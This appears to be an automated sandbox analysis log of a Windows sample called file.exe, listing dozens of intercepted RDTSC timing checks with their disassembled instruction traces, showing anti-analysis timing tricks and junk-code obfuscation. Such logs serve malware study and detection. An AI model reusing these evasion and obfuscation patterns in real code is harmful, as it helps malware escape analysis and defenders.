Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 762DCB second address: 762DD6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jo 00007F402CC7E506h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 762DD6 second address: 762E90 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pop eax 0x00000008 movsx edi, si 0x0000000b or dword ptr [ebp+122D2CD2h], ebx 0x00000011 push 00000003h 0x00000013 jmp 00007F402CDD4F5Eh 0x00000018 push 00000000h 0x0000001a movzx edi, bx 0x0000001d jl 00007F402CDD4F59h 0x00000023 movzx edi, dx 0x00000026 push 00000003h 0x00000028 mov di, 585Ch 0x0000002c push 93FE3B5Fh 0x00000031 pushad 0x00000032 pushad 0x00000033 jmp 00007F402CDD4F63h 0x00000038 push edx 0x00000039 pop edx 0x0000003a popad 0x0000003b jmp 00007F402CDD4F69h 0x00000040 popad 0x00000041 add dword ptr [esp], 2C01C4A1h 0x00000048 jno 00007F402CDD4F62h 0x0000004e lea ebx, dword ptr [ebp+12454BEEh] 0x00000054 push 00000000h 0x00000056 push ebx 0x00000057 call 00007F402CDD4F58h 0x0000005c pop ebx 0x0000005d mov dword ptr [esp+04h], ebx 0x00000061 add dword ptr [esp+04h], 00000014h 0x00000069 inc ebx 0x0000006a push ebx 0x0000006b ret 0x0000006c pop ebx 0x0000006d ret 0x0000006e xor esi, dword ptr [ebp+122D2B3Fh] 0x00000074 push eax 0x00000075 push eax 0x00000076 push edx 0x00000077 pushad 0x00000078 jl 00007F402CDD4F56h 0x0000007e pushad 0x0000007f popad 0x00000080 popad 0x00000081 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 762F05 second address: 762FBD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F402CC7E50Fh 0x00000009 popad 0x0000000a mov dword ptr [esp], eax 0x0000000d call 00007F402CC7E515h 0x00000012 pop esi 0x00000013 push 00000000h 0x00000015 push 00000000h 0x00000017 push ecx 0x00000018 call 00007F402CC7E508h 0x0000001d pop ecx 0x0000001e mov dword ptr [esp+04h], ecx 0x00000022 add dword ptr [esp+04h], 0000001Ch 0x0000002a inc ecx 0x0000002b push ecx 0x0000002c ret 0x0000002d pop ecx 0x0000002e ret 0x0000002f stc 0x00000030 call 00007F402CC7E509h 0x00000035 push edi 0x00000036 jmp 00007F402CC7E50Bh 0x0000003b pop edi 0x0000003c push eax 0x0000003d pushad 0x0000003e jbe 00007F402CC7E50Ch 0x00000044 jmp 00007F402CC7E513h 0x00000049 popad 0x0000004a mov eax, dword ptr [esp+04h] 0x0000004e push esi 0x0000004f jne 00007F402CC7E50Ch 0x00000055 pop esi 0x00000056 mov eax, dword ptr [eax] 0x00000058 jno 00007F402CC7E50Eh 0x0000005e mov dword ptr [esp+04h], eax 0x00000062 push eax 0x00000063 push edx 0x00000064 push eax 0x00000065 pushad 0x00000066 popad 0x00000067 pop eax 0x00000068 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 763163 second address: 76316D instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F402CDD4F5Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 76316D second address: 7631AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 xor dword ptr [esp], 041DE98Bh 0x0000000d movsx esi, bx 0x00000010 push 00000003h 0x00000012 ja 00007F402CC7E50Ch 0x00000018 push 00000000h 0x0000001a mov edx, dword ptr [ebp+122D2A9Bh] 0x00000020 push 00000003h 0x00000022 pushad 0x00000023 or bh, 00000053h 0x00000026 popad 0x00000027 call 00007F402CC7E509h 0x0000002c push eax 0x0000002d push edx 0x0000002e jp 00007F402CC7E508h 0x00000034 pushad 0x00000035 popad 0x00000036 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7631AD second address: 76321C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F402CDD4F61h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F402CDD4F61h 0x0000000f mov eax, dword ptr [esp+04h] 0x00000013 pushad 0x00000014 pushad 0x00000015 jmp 00007F402CDD4F5Dh 0x0000001a jc 00007F402CDD4F56h 0x00000020 popad 0x00000021 push edi 0x00000022 jg 00007F402CDD4F56h 0x00000028 pop edi 0x00000029 popad 0x0000002a mov eax, dword ptr [eax] 0x0000002c jns 00007F402CDD4F69h 0x00000032 mov dword ptr [esp+04h], eax 0x00000036 push eax 0x00000037 push edx 0x00000038 push eax 0x00000039 push edx 0x0000003a push edi 0x0000003b pop edi 0x0000003c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 76321C second address: 763226 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F402CC7E506h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 763226 second address: 76327B instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jmp 00007F402CDD4F62h 0x00000008 pop ebx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop eax 0x0000000c push 00000000h 0x0000000e push edx 0x0000000f call 00007F402CDD4F58h 0x00000014 pop edx 0x00000015 mov dword ptr [esp+04h], edx 0x00000019 add dword ptr [esp+04h], 00000017h 0x00000021 inc edx 0x00000022 push edx 0x00000023 ret 0x00000024 pop edx 0x00000025 ret 0x00000026 or edi, dword ptr [ebp+122D2A1Fh] 0x0000002c lea ebx, dword ptr [ebp+12454C02h] 0x00000032 pushad 0x00000033 xor ch, FFFFFFA0h 0x00000036 mov dword ptr [ebp+122D1B19h], ebx 0x0000003c popad 0x0000003d xchg eax, ebx 0x0000003e pushad 0x0000003f push eax 0x00000040 push edx 0x00000041 push eax 0x00000042 push edx 0x00000043 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 76327B second address: 76327F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 76327F second address: 76328C instructions: 0x00000000 rdtsc 0x00000002 jl 00007F402CDD4F56h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 76328C second address: 7632AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F402CC7E506h 0x0000000a popad 0x0000000b popad 0x0000000c push eax 0x0000000d pushad 0x0000000e jns 00007F402CC7E50Ch 0x00000014 jnp 00007F402CC7E506h 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7632AA second address: 7632AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7632AE second address: 7632B2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 781E9E second address: 781EA4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7821A4 second address: 7821A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7821A8 second address: 7821B9 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jnc 00007F402CDD4F56h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7821B9 second address: 7821BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7821BE second address: 7821CF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jng 00007F402CDD4F56h 0x00000009 jne 00007F402CDD4F56h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7821CF second address: 7821D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 782342 second address: 782346 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 782346 second address: 782352 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F402CC7E506h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7829C7 second address: 7829E4 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F402CDD4F63h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7829E4 second address: 782A01 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F402CC7E514h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 782A01 second address: 782A07 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 782B59 second address: 782B5D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 782B5D second address: 782B6D instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jc 00007F402CDD4F56h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 782B6D second address: 782B71 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 782B71 second address: 782B91 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F402CDD4F69h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 782CFB second address: 782D01 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7832B0 second address: 7832B4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7832B4 second address: 7832D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 pushad 0x00000008 popad 0x00000009 pop edi 0x0000000a jne 00007F402CC7E508h 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F402CC7E510h 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 783999 second address: 7839A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F402CDD4F56h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7839A3 second address: 7839A7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7839A7 second address: 7839B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jne 00007F402CDD4F5Ch 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7839B5 second address: 7839DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 jmp 00007F402CC7E511h 0x0000000a pushad 0x0000000b popad 0x0000000c pop ebx 0x0000000d popad 0x0000000e jnp 00007F402CC7E553h 0x00000014 push eax 0x00000015 push edx 0x00000016 jne 00007F402CC7E506h 0x0000001c pushad 0x0000001d popad 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 758BB2 second address: 758BB8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 758BB8 second address: 758BC2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 758BC2 second address: 758BE3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F402CDD4F56h 0x0000000a popad 0x0000000b js 00007F402CDD4F5Ch 0x00000011 jng 00007F402CDD4F56h 0x00000017 popad 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b pushad 0x0000001c popad 0x0000001d pushad 0x0000001e popad 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 758BE3 second address: 758BEA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 788CEF second address: 788CF3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 788CF3 second address: 788D00 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 78DFED second address: 78E005 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F402CDD4F56h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push edx 0x0000000e pop edx 0x0000000f push ecx 0x00000010 pop ecx 0x00000011 jl 00007F402CDD4F56h 0x00000017 popad 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 78E005 second address: 78E032 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F402CC7E517h 0x00000008 jmp 00007F402CC7E511h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 78E032 second address: 78E051 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F402CDD4F68h 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 78D6EA second address: 78D6EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 78D6EE second address: 78D702 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F402CDD4F5Eh 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 78D829 second address: 78D82F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 78D82F second address: 78D834 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 78DB27 second address: 78DB2D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 78DB2D second address: 78DB48 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F402CDD4F64h 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 78DB48 second address: 78DB59 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jp 00007F402CC7E508h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 78DB59 second address: 78DB5E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 78DB5E second address: 78DB68 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 push edi 0x00000007 pop edi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 78DCBD second address: 78DCC8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F402CDD4F56h 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 78DCC8 second address: 78DCFF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jbe 00007F402CC7E506h 0x00000009 jmp 00007F402CC7E518h 0x0000000e jmp 00007F402CC7E514h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 78DE63 second address: 78DE7C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F402CDD4F65h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 78DE7C second address: 78DE9A instructions: 0x00000000 rdtsc 0x00000002 jne 00007F402CC7E506h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push ebx 0x00000010 pop ebx 0x00000011 pushad 0x00000012 popad 0x00000013 pop eax 0x00000014 push edx 0x00000015 pushad 0x00000016 popad 0x00000017 jl 00007F402CC7E506h 0x0000001d pop edx 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 78DE9A second address: 78DEBB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007F402CDD4F68h 0x0000000a push esi 0x0000000b pop esi 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 791258 second address: 79126D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 pushad 0x00000009 push ecx 0x0000000a pushad 0x0000000b popad 0x0000000c pop ecx 0x0000000d push eax 0x0000000e push edx 0x0000000f jo 00007F402CC7E506h 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 79137B second address: 79138F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 mov dword ptr [esp+04h], eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jp 00007F402CDD4F56h 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 79138F second address: 791393 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 79211E second address: 792128 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnp 00007F402CDD4F56h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7922A9 second address: 7922B3 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F402CC7E50Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 793307 second address: 79330B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7931C1 second address: 7931C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 79330B second address: 793394 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000000h 0x0000000c push ebp 0x0000000d call 00007F402CDD4F58h 0x00000012 pop ebp 0x00000013 mov dword ptr [esp+04h], ebp 0x00000017 add dword ptr [esp+04h], 00000014h 0x0000001f inc ebp 0x00000020 push ebp 0x00000021 ret 0x00000022 pop ebp 0x00000023 ret 0x00000024 mov dword ptr [ebp+122D1BF2h], eax 0x0000002a mov dword ptr [ebp+122D1BD6h], edx 0x00000030 push 00000000h 0x00000032 push 00000000h 0x00000034 push esi 0x00000035 call 00007F402CDD4F58h 0x0000003a pop esi 0x0000003b mov dword ptr [esp+04h], esi 0x0000003f add dword ptr [esp+04h], 00000018h 0x00000047 inc esi 0x00000048 push esi 0x00000049 ret 0x0000004a pop esi 0x0000004b ret 0x0000004c push edi 0x0000004d mov esi, 19F20691h 0x00000052 pop esi 0x00000053 mov edi, dword ptr [ebp+122D2A47h] 0x00000059 push 00000000h 0x0000005b jmp 00007F402CDD4F67h 0x00000060 xchg eax, ebx 0x00000061 push eax 0x00000062 push edx 0x00000063 jng 00007F402CDD4F5Ch 0x00000069 jp 00007F402CDD4F56h 0x0000006f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7931C6 second address: 7931E2 instructions: 0x00000000 rdtsc 0x00000002 js 00007F402CC7E508h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F402CC7E50Dh 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 793394 second address: 793399 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7931E2 second address: 7931E7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 793C1B second address: 793C20 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 794D2D second address: 794D31 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 796390 second address: 796394 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 796394 second address: 7963AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 pushad 0x00000009 jmp 00007F402CC7E50Dh 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7963AD second address: 7963F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 popad 0x00000006 nop 0x00000007 or dword ptr [ebp+122D1EE9h], eax 0x0000000d push 00000000h 0x0000000f jmp 00007F402CDD4F67h 0x00000014 push 00000000h 0x00000016 movzx esi, dx 0x00000019 mov esi, dword ptr [ebp+122D299Bh] 0x0000001f xchg eax, ebx 0x00000020 jmp 00007F402CDD4F5Fh 0x00000025 push eax 0x00000026 push ebx 0x00000027 push edi 0x00000028 push eax 0x00000029 push edx 0x0000002a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 796158 second address: 796162 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 796C6C second address: 796C71 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7978A3 second address: 797925 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F402CC7E510h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c push 00000000h 0x0000000e push eax 0x0000000f call 00007F402CC7E508h 0x00000014 pop eax 0x00000015 mov dword ptr [esp+04h], eax 0x00000019 add dword ptr [esp+04h], 00000014h 0x00000021 inc eax 0x00000022 push eax 0x00000023 ret 0x00000024 pop eax 0x00000025 ret 0x00000026 mov dword ptr [ebp+122D1B14h], edi 0x0000002c je 00007F402CC7E50Ch 0x00000032 mov esi, dword ptr [ebp+122D2C97h] 0x00000038 push 00000000h 0x0000003a pushad 0x0000003b mov bx, 694Dh 0x0000003f popad 0x00000040 push 00000000h 0x00000042 push 00000000h 0x00000044 push ecx 0x00000045 call 00007F402CC7E508h 0x0000004a pop ecx 0x0000004b mov dword ptr [esp+04h], ecx 0x0000004f add dword ptr [esp+04h], 0000001Ch 0x00000057 inc ecx 0x00000058 push ecx 0x00000059 ret 0x0000005a pop ecx 0x0000005b ret 0x0000005c cmc 0x0000005d mov si, 59B2h 0x00000061 xchg eax, ebx 0x00000062 pushad 0x00000063 push eax 0x00000064 push edx 0x00000065 jbe 00007F402CC7E506h 0x0000006b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 797925 second address: 797964 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F402CDD4F67h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jno 00007F402CDD4F56h 0x00000010 jnl 00007F402CDD4F56h 0x00000016 popad 0x00000017 popad 0x00000018 push eax 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007F402CDD4F62h 0x00000020 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 79A398 second address: 79A3A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jl 00007F402CC7E506h 0x0000000c rdtsc
